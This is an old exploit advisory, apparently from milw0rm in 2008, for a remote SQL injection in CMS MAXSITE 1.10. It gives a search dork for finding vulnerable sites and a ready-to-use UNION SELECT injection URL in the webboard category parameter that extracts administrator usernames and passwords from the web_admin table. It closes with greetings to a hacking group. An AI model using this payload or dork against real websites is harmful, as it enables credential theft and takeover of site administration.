CMS MAXSITE 1.10 category Remote SQL Injection Vulnerability.pdf

1 ######################################################################### 2 3 CMS MAXSITE Remote SQL Injection Exploit <= 1.10 4 5 ######################################################################### 6 7 8 [+] Author: Tesz [@] THD 9 [+] Home: http://www.thaishadow.com 10 [+] Forum: http://www.thaishadow.com/board/index.php 11 12 [+] Download: http://maxsite.geniuscyber.com/index.php?name=index 13 14 [+] Dork: MAXSITE or intitle:"MAXSITE" 15 16 [+] Exploit: http://server.com/path/index.php?name=webboard&category=1+and+1=2+union+select+concat(username,0x3A,pass word)+from+web_admin/* 17 18 [+] index.php?name=webboard&category=1+and+1=2+union+select+concat(username,0x3A,password)+from+web_admin/* 19 20 [+] Greetz: krit,Exploiters,PongZ,{OHM},Usermode,windows98SE,azazel,Mr‘Ping,Os555,[T]he[S]hak 21 [+] Special Thx: THD (Thaishadow Team) 22 23 24 ########################################################################### 25 26 # milw0rm.com [2008−05−26] Page 1/1 CMS MAXSITE 1.10 category Remote SQL Injection Vulnerability Tesz 05/26/2008